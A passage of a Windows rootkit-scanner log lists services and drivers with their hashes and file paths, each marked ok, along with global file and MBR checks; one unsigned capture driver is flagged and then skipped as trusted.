09:35:44.0044 0x0ff0  [ E08E46FDD841B7184194011CA1955A0B, 9C3725BB1F08F92744C980A22ED5C874007D3B5863C7E1F140F50061052AC418 ] swprv           C:\Windows\System32\swprv.dll
09:35:44.0087 0x0ff0  swprv - ok
09:35:44.0096 0x0ff0  [ C3A39C4079305480972D29C44B868C78, 8F1BB75C743256F905EAEDE744B6082C53774C49126875FB4E4FBA30F5478B17 ] Synth3dVsc      C:\Windows\system32\drivers\synth3dvsc.sys
09:35:44.0105 0x0ff0  Synth3dVsc - ok
09:35:44.0149 0x0ff0  [ BF9CCC0BF39B418C8D0AE8B05CF95B7D, 3C13217548BE61F2BDB8BD41F77345CDDA1F97BF0AE17241C335B9807EB3DBB8 ] SysMain         C:\Windows\system32\sysmain.dll
09:35:44.0219 0x0ff0  SysMain - ok
09:35:44.0229 0x0ff0  [ E3C61FD7B7C2557E1F1B0B4CEC713585, 01F0E116606D185BF93B540868075BFB1A398197F6AABD994983DBFF56B3A8A0 ] TabletInputService C:\Windows\System32\TabSvc.dll
09:35:44.0243 0x0ff0  TabletInputService - ok
09:35:44.0257 0x0ff0  [ 40F0849F65D13EE87B9A9AE3C1DD6823, E251A7EF3D0FD2973AF33A62FC457A7E8D5E8694208F811F52455F7C2426121F ] TapiSrv         C:\Windows\System32\tapisrv.dll
09:35:44.0296 0x0ff0  TapiSrv - ok
09:35:44.0306 0x0ff0  [ 1BE03AC720F4D302EA01D40F588162F6, AB644862BF1D2E824FD846180DEC4E2C0FAFCC517451486DE5A92E5E78A952E4 ] TBS             C:\Windows\System32\tbssvc.dll
09:35:44.0328 0x0ff0  TBS - ok
09:35:44.0394 0x0ff0  [ 04ADD18EE5CC9FBEDAEC1DD1CD0CB45E, F05C0C4CA3DD234AD5D60CF1EF763C9A1D9EC3C157E180C2D75CC07E6B02A611 ] Tcpip           C:\Windows\system32\drivers\tcpip.sys
09:35:44.0448 0x0ff0  Tcpip - ok
09:35:44.0502 0x0ff0  [ 04ADD18EE5CC9FBEDAEC1DD1CD0CB45E, F05C0C4CA3DD234AD5D60CF1EF763C9A1D9EC3C157E180C2D75CC07E6B02A611 ] TCPIP6          C:\Windows\system32\DRIVERS\tcpip.sys
09:35:44.0537 0x0ff0  TCPIP6 - ok
09:35:44.0553 0x0ff0  [ 1B16D0BD9841794A6E0CDE0CEF744ABC, 7EB8BA97339199EEE7F2B09DA2DA6279DA64A510D4598D42CF86415D67CD674C ] tcpipreg        C:\Windows\system32\drivers\tcpipreg.sys
09:35:44.0562 0x0ff0  tcpipreg - ok
09:35:44.0575 0x0ff0  [ 3371D21011695B16333A3934340C4E7C, 7416F9BBFC1BA9D875EA7D1C7A0D912FC6977B49A865D67E3F9C4E18A965082D ] TDPIPE          C:\Windows\system32\drivers\tdpipe.sys
09:35:44.0592 0x0ff0  TDPIPE - ok
09:35:44.0609 0x0ff0  [ 51C5ECEB1CDEE2468A1748BE550CFBC8, 4E8F83877330B421F7B5D8393D34BC44C6450E69209DAA95B29CB298166A5DF9 ] TDTCP           C:\Windows\system32\drivers\tdtcp.sys
09:35:44.0618 0x0ff0  TDTCP - ok
09:35:44.0661 0x0ff0  [ 70988118145F5F10EF24720B97F35F65, F80C806417A68047FFB3D63214BC4AE5445315219AC594E043293006B704A63D ] tdx             C:\Windows\system32\DRIVERS\tdx.sys
09:35:44.0692 0x0ff0  tdx - ok
09:35:44.0699 0x0ff0  [ 561E7E1F06895D78DE991E01DD0FB6E5, 83BFA50A528762EC52A011302AC3874636FB7E26628CD7ACFBF2BDC9FAA8110D ] TermDD          C:\Windows\system32\DRIVERS\termdd.sys
09:35:44.0707 0x0ff0  TermDD - ok
09:35:44.0715 0x0ff0  [ 2B5BDFF688EC9871D7EC5837833374E9, BD6C629FA2938987ABF95B790B20F0B7D4D023D5013E575F343A802D6213074E ] terminpt        C:\Windows\system32\drivers\terminpt.sys
09:35:44.0725 0x0ff0  terminpt - ok
09:35:44.0786 0x0ff0  [ 008CD4EBFABCF78D0F19B3778492648C, 9050490EEE0AD86E73F0A82D83E4FC29DF84F6B6FDB389AE135FD712B5F425BE ] TermService     C:\Windows\System32\termsrv.dll
09:35:44.0810 0x0ff0  TermService - ok
09:35:44.0819 0x0ff0  [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] Themes          C:\Windows\system32\themeservice.dll
09:35:44.0832 0x0ff0  Themes - ok
09:35:44.0857 0x0ff0  [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] THREADORDER     C:\Windows\system32\mmcss.dll
09:35:44.0878 0x0ff0  THREADORDER - ok
09:35:44.0933 0x0ff0  [ E00020EC5196A532248D514262C7C7D3, FB1B8E4603D8835D6369228085DC6C03F2540D4BD0B7B8B347730F29D4C7F3EE ] TRIDCap         C:\Windows\system32\DRIVERS\AVerTM62_x64.sys
09:35:44.0981 0x0ff0  TRIDCap - detected UnsignedFile.Multi.Generic ( 1 )
09:35:50.0753 0x0ff0  Detect skipped due to KSN trusted
09:35:50.0753 0x0ff0  TRIDCap - ok
09:35:50.0776 0x0ff0  [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] TrkWks          C:\Windows\System32\trkwks.dll
09:35:50.0812 0x0ff0  TrkWks - ok
09:35:50.0838 0x0ff0  [ 773212B2AAA24C1E31F10246B15B276C, F2EF85F5ABA307976D9C649D710B408952089458DDE97D4DEF321DF14E46A046 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
09:35:50.0863 0x0ff0  TrustedInstaller - ok
09:35:50.0899 0x0ff0  [ E232A3B43A894BB327FC161529BD9ED1, F2673DA8C920F21ACCECC25F7C59A05822E5E577D47F126EDF9C94FEB4B30C5F ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
09:35:50.0912 0x0ff0  tssecsrv - ok
09:35:50.0946 0x0ff0  [ E9981ECE8D894CEF7038FD1D040EB426, DCDDCE933CAECE8180A3447199B07F2F0413704EEC1A09606EE357901A84A7CF ] TsUsbFlt        C:\Windows\system32\drivers\tsusbflt.sys
09:35:50.0970 0x0ff0  TsUsbFlt - ok
09:35:50.0994 0x0ff0  [ 9CC2CCAE8A84820EAECB886D477CBCB8, 50D8AA2D7477A6618A0C31BB4D1C4887B457865FB1105E2E7B984EEFA337B804 ] TsUsbGD         C:\Windows\system32\drivers\TsUsbGD.sys
09:35:51.0014 0x0ff0  TsUsbGD - ok
09:35:51.0030 0x0ff0  [ E1748D04AE40118B62BC18AC86032192, A954B141D1B27272C771D14F3B40C7CC1F572DD72559F2C96182EFBE2B095FDE ] tsusbhub        C:\Windows\system32\drivers\tsusbhub.sys
09:35:51.0040 0x0ff0  tsusbhub - ok
09:35:51.0062 0x0ff0  [ 3566A8DAAFA27AF944F5D705EAA64894, AE9D8B648DA08AF667B9456C3FE315489859C157510A258559F18238F2CC92B8 ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
09:35:51.0095 0x0ff0  tunnel - ok
09:35:51.0134 0x0ff0  [ B4DD609BD7E282BFC683CEC7EAAAAD67, EF131DB6F6411CAD36A989A421AF93F89DD61601AC524D2FF11C10FF6E3E9123 ] uagp35          C:\Windows\system32\drivers\uagp35.sys
09:35:51.0144 0x0ff0  uagp35 - ok
09:35:51.0165 0x0ff0  [ FF4232A1A64012BAA1FD97C7B67DF593, D8591B4EB056899C7B604E4DD852D82D4D9809F508ABCED4A03E1BE6D5D456E3 ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
09:35:51.0206 0x0ff0  udfs - ok
09:35:51.0222 0x0ff0  [ 3CBDEC8D06B9968ABA702EBA076364A1, B8DAB8AA804FC23021BFEBD7AE4D40FBE648D6C6BA21CC008E26D1C084972F9B ] UI0Detect       C:\Windows\system32\UI0Detect.exe
09:35:51.0237 0x0ff0  UI0Detect - ok
09:35:51.0257 0x0ff0  [ 4BFE1BC28391222894CBF1E7D0E42320, 5918B1ED2030600DF77BDACF1C808DF6EADDD8BF3E7003AF1D72050D8B102B3A ] uliagpkx        C:\Windows\system32\drivers\uliagpkx.sys
09:35:51.0266 0x0ff0  uliagpkx - ok
09:35:51.0284 0x0ff0  [ DC54A574663A895C8763AF0FA1FF7561, 09A3F3597E91CBEB2F38E96E75134312B60CAE5574B2AD4606C2D3E992AEDDFE ] umbus           C:\Windows\system32\DRIVERS\umbus.sys
09:35:51.0303 0x0ff0  umbus - ok
09:35:51.0319 0x0ff0  [ B2E8E8CB557B156DA5493BBDDCC1474D, F547509A08C0679ACB843E20C9C0CF51BED1B06530BBC529DFB0944504564A43 ] UmPass          C:\Windows\system32\drivers\umpass.sys
09:35:51.0327 0x0ff0  UmPass - ok
09:35:51.0344 0x0ff0  [ A293DCD756D04D8492A750D03B9A297C, 203600ED0B7F8BA4C6D6F4ED810F4DF5AB70928B06EC4131C5D8ADF628444ED1 ] UmRdpService    C:\Windows\System32\umrdp.dll
09:35:51.0358 0x0ff0  UmRdpService - ok
09:35:51.0376 0x0ff0  [ D47EC6A8E81633DD18D2436B19BAF6DE, 0FB461E2D5E0B75BB5958F6362F4880BFA4C36AD930542609BCAF574941AA7AE ] upnphost        C:\Windows\System32\upnphost.dll
09:35:51.0412 0x0ff0  upnphost - ok
09:35:51.0468 0x0ff0  [ B0435098C81D04CAFFF80DDB746CD3A2, A17B207740382E38729571F0B0BC98FF874E856A7C7CE9EB930328A2AD88F52A ] usbaudio        C:\Windows\system32\drivers\usbaudio.sys
09:35:51.0498 0x0ff0  usbaudio - ok
09:35:51.0541 0x0ff0  [ DCA68B0943D6FA415F0C56C92158A83A, BEE5A5B33B22D1DF50B884D46D89FC3B8286EB16E38AD5A20F0A49E5C6766C57 ] usbccgp         C:\Windows\system32\DRIVERS\usbccgp.sys
09:35:51.0605 0x0ff0  usbccgp - ok
09:35:51.0653 0x0ff0  [ 80B0F7D5CCF86CEB5D402EAAF61FEC31, 140C62116A425DEAD25FE8D82DE283BC92C482A9F643658D512F9F67061F28AD ] usbcir          C:\Windows\system32\drivers\usbcir.sys
09:35:51.0670 0x0ff0  usbcir - ok
09:35:51.0707 0x0ff0  [ 18A85013A3E0F7E1755365D287443965, 811C5EDF38C765BCF71BCE25CB6626FF6988C3699F5EF1846240EA0052F34C33 ] usbehci         C:\Windows\system32\DRIVERS\usbehci.sys
09:35:51.0717 0x0ff0  usbehci - ok
09:35:51.0734 0x0ff0  [ 8D1196CFBB223621F2C67D45710F25BA, B5D7AFE51833B24FC9576F3AED3D8A2B290E5846060E73F9FFFAC1890A8B6003 ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
09:35:51.0750 0x0ff0  usbhub - ok
09:35:51.0762 0x0ff0  [ 765A92D428A8DB88B960DA5A8D6089DC, 56DE8A2ED58E53B202C399CA7BACB1551136303C2EE0AB426BDBBF880E3C542C ] usbohci         C:\Windows\system32\drivers\usbohci.sys
09:35:51.0771 0x0ff0  usbohci - ok
09:35:51.0785 0x0ff0  [ 73188F58FB384E75C4063D29413CEE3D, B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C ] usbprint        C:\Windows\system32\DRIVERS\usbprint.sys
09:35:51.0807 0x0ff0  usbprint - ok
09:35:51.0831 0x0ff0  [ 9661DA76B4531B2DA272ECCE25A8AF24, FEA93254A21E71A7EB8AD35FCCAD2C1E41F7329EC33B1734F5B41307A34D8637 ] usbscan         C:\Windows\system32\drivers\usbscan.sys
09:35:51.0850 0x0ff0  usbscan - ok
09:35:51.0866 0x0ff0  [ FED648B01349A3C8395A5169DB5FB7D6, DC4D7594C24ADD076927B9347F1B50B91CF03A4ABDB284248D5711D9C19DEB96 ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
09:35:51.0881 0x0ff0  USBSTOR - ok
09:35:51.0888 0x0ff0  [ DD253AFC3BC6CBA412342DE60C3647F3, 146F8613F1057AC054DC3593E84BC52899DA27EA33B0E72ACFB78C3699ADCDE7 ] usbuhci         C:\Windows\system32\DRIVERS\usbuhci.sys
09:35:51.0904 0x0ff0  usbuhci - ok
09:35:51.0933 0x0ff0  [ 1F775DA4CF1A3A1834207E975A72E9D7, 6D3DE5BD3EF3A76E997E5BAF900C51D25308F5A9682D1F62017F577A24095B90 ] usbvideo        C:\Windows\System32\Drivers\usbvideo.sys
09:35:51.0956 0x0ff0  usbvideo - ok
09:35:51.0972 0x0ff0  [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] UxSms           C:\Windows\System32\uxsms.dll
09:35:51.0995 0x0ff0  UxSms - ok
09:35:52.0041 0x0ff0  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] VaultSvc        C:\Windows\system32\lsass.exe
09:35:52.0050 0x0ff0  VaultSvc - ok
09:35:52.0059 0x19b8  Object required for P2P: [ DF2213CF2DD81B790B85541D138D93C7 ] nvlddmkm
09:35:52.0060 0x0ff0  [ C5C876CCFC083FF3B128F933823E87BD, 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D ] vdrvroot        C:\Windows\system32\drivers\vdrvroot.sys
09:35:52.0068 0x0ff0  vdrvroot - ok
09:35:52.0086 0x0ff0  [ 8D6B481601D01A456E75C3210F1830BE, A2CEF483F4231367138EEF7E67FD5BE5364FC0780C44CA1368E36CE4AA3D0633 ] vds             C:\Windows\System32\vds.exe
09:35:52.0118 0x0ff0  vds - ok
09:35:52.0130 0x0ff0  [ DA4DA3F5E02943C2DC8C6ED875DE68DD, EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
09:35:52.0145 0x0ff0  vga - ok
09:35:52.0157 0x0ff0  [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] VgaSave         C:\Windows\System32\drivers\vga.sys
09:35:52.0184 0x0ff0  VgaSave - ok
09:35:52.0185 0x0ff0  VGPU - ok
09:35:52.0199 0x0ff0  [ 2CE2DF28C83AEAF30084E1B1EB253CBB, D1946816A1CB89F825CBEA58F94A4C9D0CE7249355CD3915563F54054EE564BF ] vhdmp           C:\Windows\system32\drivers\vhdmp.sys
09:35:52.0210 0x0ff0  vhdmp - ok
09:35:52.0230 0x0ff0  [ E5689D93FFE4E5D66C0178761240DD54, 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27 ] viaide          C:\Windows\system32\drivers\viaide.sys
09:35:52.0238 0x0ff0  viaide - ok
09:35:52.0261 0x0ff0  [ 86EA3E79AE350FEA5331A1303054005F, 7E7D6027EB41E591633C7383A5D29A3BA8ECFC08C177D2BCF741EE27686B1691 ] vmbus           C:\Windows\system32\drivers\vmbus.sys
09:35:52.0272 0x0ff0  vmbus - ok
09:35:52.0282 0x0ff0  [ 7DE90B48F210D29649380545DB45A187, 09522F84285D62B961868DA98C40B82E746CA4D24A9780905673A2349D6B07F4 ] VMBusHID        C:\Windows\system32\drivers\VMBusHID.sys
09:35:52.0290 0x0ff0  VMBusHID - ok
09:35:52.0309 0x0ff0  [ D2AAFD421940F640B407AEFAAEBD91B0, 31EF342A60AF04F4108759A71F8FB7B8C8819216CF3D16A95B2BA0E33A8A9161 ] volmgr          C:\Windows\system32\drivers\volmgr.sys
09:35:52.0317 0x0ff0  volmgr - ok
09:35:52.0335 0x0ff0  [ A255814907C89BE58B79EF2F189B843B, 463DB771851352185B6AC323BD93B9084D47291E53C1F7B628B65D6918B2E28F ] volmgrx         C:\Windows\system32\drivers\volmgrx.sys
09:35:52.0349 0x0ff0  volmgrx - ok
09:35:52.0367 0x0ff0  [ 0D08D2F3B3FF84E433346669B5E0F639, 3D6716CEC95B8861A7CC5778E91F310528DC6BEE0E57A3C8757FC675154EBDEC ] volsnap         C:\Windows\system32\drivers\volsnap.sys
09:35:52.0379 0x0ff0  volsnap - ok
09:35:52.0398 0x0ff0  [ 5E2016EA6EBACA03C04FEAC5F330D997, 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC ] vsmraid         C:\Windows\system32\drivers\vsmraid.sys
09:35:52.0409 0x0ff0  vsmraid - ok
09:35:52.0452 0x0ff0  [ B60BA0BC31B0CB414593E169F6F21CC2, 47B801E623254CF0202B3591CB5C019CABFB52F123C7D47E29D19B32F1F2B915 ] VSS             C:\Windows\system32\vssvc.exe
09:35:52.0530 0x0ff0  VSS - ok
09:35:52.0537 0x0ff0  [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] vwifibus        C:\Windows\System32\drivers\vwifibus.sys
09:35:52.0562 0x0ff0  vwifibus - ok
09:35:52.0580 0x0ff0  [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time         C:\Windows\system32\w32time.dll
09:35:52.0610 0x0ff0  W32Time - ok
09:35:52.0625 0x0ff0  [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen        C:\Windows\system32\drivers\wacompen.sys
09:35:52.0638 0x0ff0  WacomPen - ok
09:35:52.0648 0x0ff0  [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
09:35:52.0677 0x0ff0  WANARP - ok
09:35:52.0680 0x0ff0  [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
09:35:52.0701 0x0ff0  Wanarpv6 - ok
09:35:52.0765 0x0ff0  [ 3CEC96DE223E49EAAE3651FCF8FAEA6C, 4150DAB33E8D61076F1D4767BCAFC9B4ECCCCBD58FD4FB3CFE5B8D27DCDCAB61 ] WatAdminSvc     C:\Windows\system32\Wat\WatAdminSvc.exe
09:35:52.0808 0x0ff0  WatAdminSvc - ok
09:35:52.0858 0x0ff0  [ 78F4E7F5C56CB9716238EB57DA4B6A75, 46A4E78CE5F2A4B26F4E9C3FF04A99D9B727A82AC2E390A82A1611C3F6E0C9AF ] wbengine        C:\Windows\system32\wbengine.exe
09:35:52.0918 0x0ff0  wbengine - ok
09:35:52.0924 0x0ff0  [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
09:35:52.0939 0x0ff0  WbioSrvc - ok
09:35:52.0980 0x0ff0  [ 7368A2AFD46E5A4481D1DE9D14848EDD, 8039C478FC2D9F095F5883A4FA47F9E6EDF57CC88A4AA74F07C88445F90DED57 ] wcncsvc         C:\Windows\System32\wcncsvc.dll
09:35:53.0002 0x0ff0  wcncsvc - ok
09:35:53.0016 0x0ff0  [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
09:35:53.0024 0x0ff0  WcsPlugInService - ok
09:35:53.0034 0x0ff0  [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd              C:\Windows\system32\drivers\wd.sys
09:35:53.0042 0x0ff0  Wd - ok
09:35:53.0090 0x0ff0  [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
09:35:53.0113 0x0ff0  Wdf01000 - ok
09:35:53.0126 0x0ff0  [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiServiceHost  C:\Windows\system32\wdi.dll
09:35:53.0145 0x0ff0  WdiServiceHost - ok
09:35:53.0148 0x0ff0  [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiSystemHost   C:\Windows\system32\wdi.dll
09:35:53.0159 0x0ff0  WdiSystemHost - ok
09:35:53.0177 0x0ff0  [ 0EB0E5D22B1760F2DBCE632F2DD7A54D, B8A4CC62F88768947FB0A161CF9564DB28FD9C1C037B5475DF192982DE035C22 ] WebClient       C:\Windows\System32\webclnt.dll
09:35:53.0190 0x0ff0  WebClient - ok
09:35:53.0198 0x0ff0  [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc          C:\Windows\system32\wecsvc.dll
09:35:53.0231 0x0ff0  Wecsvc - ok
09:35:53.0240 0x0ff0  [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport   C:\Windows\System32\wercplsupport.dll
09:35:53.0263 0x0ff0  wercplsupport - ok
09:35:53.0278 0x0ff0  [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc          C:\Windows\System32\WerSvc.dll
09:35:53.0307 0x0ff0  WerSvc - ok
09:35:53.0324 0x0ff0  [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
09:35:53.0345 0x0ff0  WfpLwf - ok
09:35:53.0390 0x0ff0  [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
09:35:53.0397 0x0ff0  WIMMount - ok
09:35:53.0415 0x0ff0  WinDefend - ok
09:35:53.0418 0x0ff0  WinHttpAutoProxySvc - ok
09:35:53.0455 0x0ff0  [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt         C:\Windows\system32\wbem\WMIsvc.dll
09:35:53.0481 0x0ff0  Winmgmt - ok
09:35:53.0551 0x0ff0  [ D929ABD465A2DED963DA8B30946A8D5C, DE8DBFB01C11D2AE903CBD6A974D6F995E9813CE2D6484B7DA06EAE4C545842A ] WinRM           C:\Windows\system32\WsmSvc.dll
09:35:53.0609 0x0ff0  WinRM - ok
09:35:53.0652 0x0ff0  [ FE88B288356E7B47B74B13372ADD906D, A16B166F6BB32EF9D2A142F27B9EC54CBC7B3AC915799783CF4C40E525BC9E03 ] WinUsb          C:\Windows\system32\DRIVERS\WinUsb.sys
09:35:53.0663 0x0ff0  WinUsb - ok
09:35:53.0693 0x0ff0  [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc         C:\Windows\System32\wlansvc.dll
09:35:53.0730 0x0ff0  Wlansvc - ok
09:35:53.0844 0x0ff0  [ 98F138897EF4246381D197CB81846D62, A9FA88475AFBB8883297708608EC7C1AC29F229C3299A84D557172604813A18C ] wlidsvc         C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
09:35:53.0906 0x0ff0  wlidsvc - ok
09:35:53.0919 0x0ff0  [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi         C:\Windows\system32\DRIVERS\wmiacpi.sys
09:35:53.0936 0x0ff0  WmiAcpi - ok
09:35:53.0954 0x0ff0  [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
09:35:53.0974 0x0ff0  wmiApSrv - ok
09:35:53.0996 0x0ff0  WMPNetworkSvc - ok
09:35:53.0999 0x0ff0  [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc          C:\Windows\System32\wpcsvc.dll
09:35:54.0008 0x0ff0  WPCSvc - ok
09:35:54.0020 0x0ff0  [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
09:35:54.0032 0x0ff0  WPDBusEnum - ok
09:35:54.0055 0x0ff0  [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
09:35:54.0088 0x0ff0  ws2ifsl - ok
09:35:54.0097 0x0ff0  [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc          C:\Windows\System32\wscsvc.dll
09:35:54.0119 0x0ff0  wscsvc - ok
09:35:54.0179 0x0ff0  [ 8D918B1DB190A4D9B1753A66FA8C96E8, DB7D2714DC04D2D6999A207D7399A5647C8653E5A1AD80856A65C5B6065AEDFE ] WSDPrintDevice  C:\Windows\system32\DRIVERS\WSDPrint.sys
09:35:54.0190 0x0ff0  WSDPrintDevice - ok
09:35:54.0192 0x0ff0  WSearch - ok
09:35:54.0281 0x0ff0  [ 61FF576450CCC80564B850BC3FB6713A, B2843BC9E2F62D27DCF6787D063378926748CE75002BADA1873DCB5039883705 ] wuauserv        C:\Windows\system32\wuaueng.dll
09:35:54.0354 0x0ff0  wuauserv - ok
09:35:54.0373 0x0ff0  [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
09:35:54.0383 0x0ff0  WudfPf - ok
09:35:54.0405 0x0ff0  [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
09:35:54.0429 0x0ff0  WUDFRd - ok
09:35:54.0438 0x0ff0  [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
09:35:54.0448 0x0ff0  wudfsvc - ok
09:35:54.0483 0x0ff0  [ 04F82965C09CBDF646B487E145060301, 2CD8533EDBE24C3E42EB7550E20F8A2EB9E5E345B165DEF543163A6BC1FDD18B ] WwanSvc         C:\Windows\System32\wwansvc.dll
09:35:54.0508 0x0ff0  WwanSvc - ok
09:35:54.0565 0x0ff0  X6va012 - ok
09:35:54.0597 0x0ff0  xhunter1 - ok
09:35:54.0651 0x0ff0  [ 377F3E3467A8BFA3CDC921AD6425D513, 699271DA1D63E90FE1F9FE8AF3A8789CA588A0B7A2AFF5899EBA443361E041A5 ] XSplit_Dummy    C:\Windows\system32\drivers\xspltspk.sys
09:35:54.0668 0x0ff0  XSplit_Dummy - ok
09:35:54.0677 0x0ff0  ================ Scan global ===============================
09:35:54.0693 0x0ff0  [ BA0CD8C393E8C9F83354106093832C7B, 18D8A4780A2BAA6CEF7FBBBDA0EF6BF2DADF146E1E578A618DD5859E8ADBF1A8 ] C:\Windows\system32\basesrv.dll
09:35:54.0722 0x0ff0  [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
09:35:54.0731 0x0ff0  [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
09:35:54.0747 0x0ff0  [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\system32\sxssrv.dll
09:35:54.0759 0x0ff0  [ 24ACB7E5BE595468E3B9AA488B9B4FCB, 63541E3432FCE953F266AE553E7A394978D6EE3DB52388D885F668CF42C5E7E2 ] C:\Windows\system32\services.exe
09:35:54.0764 0x0ff0  [ Global ] - ok
09:35:54.0764 0x0ff0  ================ Scan MBR ==================================
09:35:54.0777 0x0ff0  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
09:35:55.0032 0x0ff0  \Device\Harddisk0\DR0 - ok
09:35:55.0045 0x0ff0  [ 8F558EB6672622401DA993E1E865C861 ] \Device\Harddisk2\DR2
09:35:55.0455 0x0ff0  \Device\Harddisk2\DR2 - ok
09:35:55.0457 0x0ff0  [ 8F558EB6672622401DA993E1E865C861 ] \Device\Harddisk1\DR1
09:35:55.0502 0x19b8  Object send P2P result: true
